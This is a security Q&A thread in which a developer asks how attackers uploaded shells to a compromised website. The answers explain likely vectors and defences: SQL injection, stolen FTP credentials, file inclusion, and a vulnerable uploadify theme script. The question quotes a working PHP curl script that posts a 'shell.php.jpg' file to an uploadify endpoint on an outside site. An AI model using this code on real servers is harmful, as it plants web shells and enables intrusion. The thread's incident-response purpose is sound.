5

I was entrusted with an existed website for which I should do some changes on the design part, but when I was about to access it, i've seen that it has been compromised. When I was searching for the problem, I found an exploit PHP file containing this code:

$uploadfile="shell.php.jpg";

$ch = curl_init("http://macwallpaper.net/wp-content/themes/echea/js/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

array('Filedata'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

I can figure out what this script is doing, but I have no idea how the attacker managed to upload it on the server. The only form that the website had was a contact form, and it was only the HTML part without the mail function. Furthermore, I've found 4 more PHP files designed as shells, with a lot of code inside, so I'm not going to post it here.

Are there any ways of deploying such packages without an uploading form, actually without a form at all?

EDIT: The website does have a database , but no other control platform like an administration portal or a client zone (there is no direct access toward the database), it does have a ftp , but i have no other information regarding ssh/scp ,etc .

Petru Lebada
  • 103
  • 3
Jason
  • 51
  • 1
  • 2
  • Does it use a database? Is there any admin control panel? – A. Darwin Jun 02 '16 at 07:37
  • 1
    The security hole could be somewhere else, not necesaraly in the PHP. Maybe a breached FTP password or an SSH login? Or an other website hosted on the same server? – Anders Jun 02 '16 at 07:44
  • yes,there is a database , but there are just a few SELECT which it uses to retrieve the menu content. – Petru Lebada Jun 02 '16 at 07:44
  • @Anders , yes the breached ftp/ssh may be a posibility , but how can they find the credentials? – Petru Lebada Jun 02 '16 at 07:46
  • @Petru Lebada: Even a SELECT query can be used to inject data to your sql server through batch queries if your sql server allows it. (for example, SELECT * ; INSERT INTO **) – Azami Jun 02 '16 at 07:51
  • @MadWard , i agree , but is it the case here ? The database was untouched. – Petru Lebada Jun 02 '16 at 07:53
  • @PetruLebada You asked how they can find FTP/SSH. There are different ways, including a bruteforce attack. If you are the OP, I suggest you to edit your answer, specifying the main components/features of the website, e.g. database, password-protected area for users, admin control panel, protocols used (FTP, SCP, SSH,...). – A. Darwin Jun 02 '16 at 07:56
  • @Petru Lebada: If I'm not mistaken, the SELECT INTO OUTFILE syntax could be used to inject arbitrary php code on your server. My main point is "don't rule out sql injections too quickly". – Azami Jun 02 '16 at 08:06
  • @A.Darwin , i did the requested edit – Petru Lebada Jun 02 '16 at 08:06
  • @MadWard , indeed ... i forgot about that , but even so , how can he inject something like this ? there is no direct access towards the database – Petru Lebada Jun 02 '16 at 08:07
  • 1
    If your pages make insecure requests from the database, an attacker wouldn't need direct access to it. Similarly, if your pages write to the server filesystem, it's entirely possible that an attacker could abuse those. Examine your server log files for unusual traffic - perhaps large numbers of ftp login attempts, where an attacker is trying to guess a password, or PUT requests against your pages, or anything with a useragent of sqlmap - there are many possibilities. – Matthew Jun 02 '16 at 08:18
  • Related http://stackoverflow.com/questions/8115159/can-people-write-a-php-file-to-my-chmod-777-folder – Purefan Jun 02 '16 at 08:29

2 Answers2

6

There are a lot of ways. Judging by the main features of your website, an attacker could have used:

  • SQL injection: it is not necessary to have direct access to the database. If you want technical details, this question and its answers explain different ways to obtain a shell from a SQL injection;

  • credential theft: the attacker could have stolen or otherwise obtained your FTP credentials. This can happen through bruteforce attacks, but since standard FTP is not encrypted, and the password is transmitted in cleartext, an attacker could also have sniffed the connection (for example, if you were using a public Wi-Fi network), obtained the password and used it to upload these files;

  • file inclusion (LFI/RFI): if the website is not designed in a careful way, an attacker could upload any PHP file even without any form,database, or stolen credential. For more information: https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion and https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion;

  • malware in your computer: it is possible for an attacker to infect the computer you use to access the website with malware, which could in turn be used to upload PHP files in the website as if you did it. You should already know that there are several ways to infect your computer with malware, but I'm going to highlight one. Spear phishing;

  • countless other ways. I strongly suggest you to take a look at https://www.owasp.org . It contains a lot of information about web application security, including how to perform code reviews, how to test your website for common vulnerabilities and how to eventually defend it from most attacks.

Community
  • 1
A. Darwin
  • 3,602
  • 2
  • 17
  • 27
2

Search for uploadify on https://www.exploit-db.com and you will notice that the JS-Script is part of your theme and vulnerable to Arbitrary File Upload Vulnerability.

You could delete that Script and your theme might still work or better yet use another more secure theme.

user112287
  • 21
  • 1